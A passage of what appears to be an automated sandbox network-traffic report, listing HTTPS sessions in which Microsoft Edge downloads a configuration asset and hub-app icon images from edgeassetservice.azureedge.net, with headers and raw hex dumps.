                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1
                                                                                                                                                      Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03
                                                                                                                                                      Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40
                                                                                                                                                      Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6
                                                                                                                                                      Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      13192.168.2.44976613.107.246.634438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:23 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                      Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                      Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                      Sec-Mesh-Client-OS: Windows
                                                                                                                                                      Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                      Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                      Sec-Mesh-Client-WebView: 0
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:24 UTC555INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:24 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 70207
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                      Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT
                                                                                                                                                      ETag: 0x8DD0B38CBCCFA90
                                                                                                                                                      x-ms-request-id: 1a4f89b3-d01e-0008-14dc-457374000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125824Z-1746fd949bd9x4mhhC1EWRb76n00000001cg0000000007kg
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:24 UTC15829INData Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                      Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0 b1 dc 86 43 a9 41 db b1
                                                                                                                                                      Data Ascii: *|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7CA
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd f5 40 34 cd c4 ce 27 1e
                                                                                                                                                      Data Ascii: kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkXpZs>"q@4'
                                                                                                                                                      2024-12-04 12:58:24 UTC16384INData Raw: 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65 84 fb 4f 5b 04 9b a8 7d
                                                                                                                                                      Data Ascii: CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}eO[}
                                                                                                                                                      2024-12-04 12:58:24 UTC5226INData Raw: b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28 e6 0e 92 0c 4e 75 b7 c0
                                                                                                                                                      Data Ascii: a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(Nu


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      14192.168.2.44977213.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC543INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 1966
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                      ETag: 0x8DBDCB5EC122A94
                                                                                                                                                      x-ms-request-id: fe45fbd2-101e-0037-27e8-45c4a8000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bd4w8sthC1EWR700400000000xg000000009ewm
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:27 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      15192.168.2.44977713.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC536INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 1751
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                      ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                      x-ms-request-id: 2cfb8a98-d01e-0047-1ae8-45b76c000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bdjrnwqhC1EWRpg2800000001d0000000000x6r
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:27 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      16192.168.2.44977313.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC515INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 1427
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                      ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                      x-ms-request-id: d852e5ff-501e-005d-1940-469803000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bdkw94lhC1EWRxuz400000001d0000000006kuw
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:27 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      17192.168.2.44977513.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC522INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 2008
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                      ETag: 0x8DBC9B5C0C17219
                                                                                                                                                      x-ms-request-id: 6102d7ee-101e-0037-7240-46c4a8000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bd6ztf6hC1EWRvq2s00000000z00000000026zq
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
